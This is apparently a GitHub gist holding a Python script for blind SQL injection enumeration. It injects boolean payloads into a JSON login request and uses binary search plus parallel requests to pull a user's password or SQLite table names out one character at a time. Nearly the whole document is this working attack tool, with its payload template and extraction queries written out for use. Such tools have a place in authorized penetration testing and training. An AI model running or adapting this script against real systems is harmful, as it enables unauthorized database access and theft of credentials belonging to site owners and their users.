Last active
January 7, 2021 09:08
-
-
Save RPHAELLA/a3a3e708653f61970a959f18dd77e915 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Blind SQL Injection Enumeration | |
# Copyright (C) 2019 | |
#!/usr/bin/python | |
import sys | |
import re | |
import json | |
import requests | |
import urllib3 | |
from itertools import repeat | |
from multiprocessing import Pool | |
# Both plain and TLS traffic are routed through the local proxy at 127.0.0.1:8080.
proxies = dict(
    http="http://127.0.0.1:8080",
    https="http://127.0.0.1:8080",
)

# Certificate verification is switched off on the session below, so silence
# the warnings urllib3 would otherwise emit.
urllib3.disable_warnings()

# Shared HTTP session used for every request sent by this script.
s = requests.Session()
s.verify = False
s.proxies.update(proxies)
''' | |
Send payload with different [CHAR] to server | |
''' | |
def _sending_payload(args, sqli, j):
    """Send one probe for candidate character code ``j``.

    The ``[CHAR]`` placeholder in ``sqli`` is replaced by the candidate, the
    result is substituted into ``args["payload"]`` (``[PAYLOAD]``) and then
    into ``args["data_string"]`` (``[INJECTION]``), and the request is sent
    through the module-level session ``s``.

    Args:
        args: Attack configuration; reads the keys ``sql_type``, ``payload``,
            ``data_string``, ``method``, ``target``, ``header`` and
            ``search_term``.
        sqli: Injection expression still containing ``[CHAR]``.
        j: Integer character code to test.

    Returns:
        ``j`` when ``args["search_term"]`` (a regex) is found in the response
        body, otherwise ``None``.

    Raises:
        ValueError: If ``args["method"]`` is neither ``"GET"`` nor ``"POST"``.
    """
    if args["sql_type"] == "sqlite":
        # SQLite's hex() yields UPPER-case, two-digits-per-byte text, so the
        # literal we compare against must be rendered the same way; a
        # lower-case literal never equals e.g. '6F' and also breaks the
        # ordering used by the '<' probes.
        char_token = format(j, "02X")
    else:
        char_token = str(j)

    modified_sqli = sqli.replace("[CHAR]", char_token)
    payload = args["payload"].replace("[PAYLOAD]", modified_sqli)
    data_string = args["data_string"].replace("[INJECTION]", payload)

    method = args["method"]
    if method == "GET":
        r = s.get(url=args["target"], headers=args["header"], params=data_string)
    elif method == "POST":
        r = s.post(url=args["target"], headers=args["header"], data=data_string)
    else:
        # Previously this fell through and failed later on an unbound name.
        raise ValueError("Unsupported HTTP method: %r" % (method,))

    if re.search(args["search_term"], r.text):
        return j
    return None
''' | |
Use a multiprocessing pool to speed up sending of payloads
TO-DO: Allow no. of processes to be set dynamically | |
''' | |
def _worker_sending(args, sqli, start, end, processes=5):
    """Probe every candidate code in ``range(start, end)`` with an equality test.

    Args:
        args: Attack configuration passed through to ``_sending_payload``.
        sqli: Injection expression containing ``[COMPARATOR]`` and ``[CHAR]``.
        start: First candidate character code (inclusive).
        end: End of the candidate range (exclusive).
        processes: Number of worker processes in the pool (defaults to the
            previously hard-coded value of 5).

    Returns:
        A list with one entry per candidate, in order: the candidate code
        where the probe matched, ``None`` where it did not.
    """
    candidates = range(start, end)
    if not candidates:
        # Nothing to test; avoid spinning up a process pool for no work.
        return []

    sqli = sqli.replace("[COMPARATOR]", "=")
    iterable = zip(repeat(args), repeat(sqli), candidates)
    with Pool(processes=processes) as pool:
        return pool.starmap(_sending_payload, iterable)
''' | |
Search for the most optimal range of ascii [CHAR] to enumerate | |
TO-DO: Allow dynamically set counter | |
''' | |
def _finding_optimal(args, sqli, start, end, counter, max_depth=3):
    """Narrow the candidate character window with a few ``<`` probes.

    Each step probes "character < mid" for the midpoint of the current window
    and keeps the half the answer points to.

    Args:
        args: Attack configuration passed through to ``_sending_payload``.
        sqli: Injection expression containing ``[COMPARATOR]`` and ``[CHAR]``.
        start: Lower bound of the current window.
        end: Upper bound of the current window.
        counter: Number of narrowing steps already performed.
        max_depth: Total number of narrowing steps to perform (defaults to
            the previously hard-coded value of 3).

    Returns:
        A ``(start, end)`` tuple describing the narrowed window.
    """
    osqli = sqli.replace("[COMPARATOR]", "<")
    while counter < max_depth:
        mid = start + ((end - start) // 2)
        if _sending_payload(args, osqli, mid) is not None:
            # Character is strictly below mid: keep the lower half.
            end = mid
        else:
            # Character is >= mid, so mid itself is the lowest remaining
            # candidate (mid - 1 has already been ruled out by this probe).
            start = mid
        counter += 1
    return start, end
''' | |
Get the most optimal range of ascii [CHAR] and proceed to send payload | |
''' | |
def _optimize_attack(args, sqli):
    """Narrow the printable-ASCII window, then test the remaining candidates.

    Args:
        args: Attack configuration passed through to the helpers.
        sqli: Injection expression containing ``[COMPARATOR]`` and ``[CHAR]``.

    Returns:
        The list produced by ``_worker_sending``: one entry per tested
        candidate, the candidate code on a match and ``None`` otherwise.
    """
    # The window end is consumed by range(start, end) in _worker_sending and
    # is therefore exclusive; 127 is needed so that '~' (126) is still tested.
    start, end = _finding_optimal(args, sqli, 32, 127, 0)
    return _worker_sending(args, sqli, start, end)
''' | |
Set the injection comparators for payload | |
TO-DO: Move injection_string to allow user to define easier | |
''' | |
def _formulate_payload(args, sql_query, eof_range):
    """Extract the result of ``sql_query`` one character at a time.

    For each 1-based position below ``eof_range`` an injection expression is
    built for that position and handed to ``_optimize_attack``. Every
    recovered character is echoed to stdout as soon as it is found.

    Args:
        args: Attack configuration; ``args["sql_type"]`` selects the
            expression template.
        sql_query: SQL query whose result is being extracted.
        eof_range: One past the last character position to read.

    Returns:
        The recovered characters joined into a string. Positions for which no
        candidate matched are skipped.
    """
    recovered = []
    for i in range(1, eof_range):
        if args["sql_type"] == "sqlite":
            injection_string = "hex(substr((%s),%d,1))[COMPARATOR]'[CHAR]'" % (sql_query, i)
        else:
            # NOTE(review): unlike the sqlite template, sql_query is not
            # wrapped in parentheses here - confirm this is intended.
            injection_string = "(ascii(substring(%s from %d for 1)))[COMPARATOR][CHAR]" % (sql_query, i)

        output = _optimize_attack(args, injection_string)

        # Explicit "is not None" test: the old filter(None.__ne__, ...) relied
        # on the truth value of NotImplemented, which is deprecated, and the
        # bare except around it would have hidden the resulting failure.
        code = next((c for c in output if c is not None), None)
        if code is None:
            # No candidate matched at this position; keep going (best effort).
            continue

        extracted_char = chr(code)
        sys.stdout.write(extracted_char)
        sys.stdout.flush()
        recovered.append(extracted_char)
    return "".join(recovered)
''' | |
Read every single record returned from the database
- Length is fixed to read 2 chars | |
- Data is dependent on the return value of length | |
''' | |
def _process_payload(index, args, sql_query):
    """Extract one record: first its length, then that many characters.

    Args:
        index: Record number, used only in the progress output.
        args: Attack configuration passed through to ``_formulate_payload``.
        sql_query: Two-item sequence; item 0 is the query returning the
            record's length, item 1 the query returning the record itself.

    Returns:
        The extracted record as a string, or ``""`` when the length could not
        be read as a number.
    """
    sys.stdout.write("\n[Record %s] Length: " % index)
    # The length is read as at most two characters (positions 1 and 2).
    length = _formulate_payload(args, sql_query[0], 2 + 1)
    sys.stdout.flush()

    try:
        data_length = int(length)
    except ValueError:
        # Nothing (or something non-numeric) came back for the length; report
        # it and skip this record instead of aborting the whole enumeration.
        sys.stdout.write("\n[Record %s] Unable to determine length, skipping" % index)
        sys.stdout.flush()
        return ""

    sys.stdout.write("\n[Record %s] Data: " % index)
    return _formulate_payload(args, sql_query[1], data_length + 1)
''' | |
To allow single or multiple data-records enumeration | |
''' | |
def _staging_payload(type, args, sql_query):
    """Run a single-record or a multi-record enumeration.

    Args:
        type: ``"s"`` to extract a single record, ``"r"`` to first read the
            record count and then extract each record in turn. Any other
            value does nothing.
        args: Attack configuration passed through to the helpers.
        sql_query: For ``"s"``: the ``[length_query, data_query]`` pair.
            For ``"r"``: ``[count_query, length_query, data_query]``, where
            the last two contain an ``[OFFSET]`` placeholder.

    Returns:
        None. Results are written to stdout by the helpers.
    """
    if type == "s":
        _process_payload(0, args, sql_query)
    elif type == "r":
        sys.stdout.write("[*] Total records: ")
        # The record count is read as at most two characters.
        records = _formulate_payload(args, sql_query[0], 2 + 1)
        sys.stdout.flush()

        try:
            total = int(records)
        except ValueError:
            # The count could not be extracted; there is nothing to iterate.
            sys.stdout.write("\n[!] Unable to determine the number of records")
            sys.stdout.flush()
            return

        for i in range(total):
            # Point the per-record queries at row i.
            tmp_query = [item.replace("[OFFSET]", str(i)) for item in sql_query[1:]]
            _process_payload(i, args, tmp_query)
''' | |
Set injection payload | |
''' | |
def _launch(args, context):
    """Pick the SQL queries for ``context`` and start the enumeration.

    ``"password"`` runs a single-record extraction, ``"tables"`` a
    multi-record one. Any other context does nothing and returns ``None``.

    Query variants noted by the original author:
      [1] limit/**/1,1
      [2] where id=1
    """
    if context == "password":
        mode = "s"
        queries = [
            "select length(password) from users where id=1",
            "select password from users where id=1",
        ]
    elif context == "tables":
        mode = "r"
        queries = [
            "SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'",
            "SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset [OFFSET]",
            "SELECT tbl_name FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset [OFFSET]",
        ]
    else:
        return None

    return _staging_payload(mode, args, queries)
def main():
    """Assemble the attack configuration and enumerate the table names."""
    args = {
        # Request settings.
        "target": "",
        "method": "POST",
        "header": {"content-type": "application/json"},
        # Request body template; [INJECTION] is replaced by the payload.
        "data_string": '{"email": "[INJECTION]", "password":"\'"}',
        # Payload template; [PAYLOAD] is replaced by the injection expression.
        "payload": "' OR ([PAYLOAD]) /*",
        # Pattern searched for in the response body to detect a match.
        "search_term": "authentication",
        "sql_type": "sqlite",
    }
    _launch(args, "tables")
    print("\n[+] Done!")


# Only run the attack when executed as a script.
if __name__ == "__main__":
    main()
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment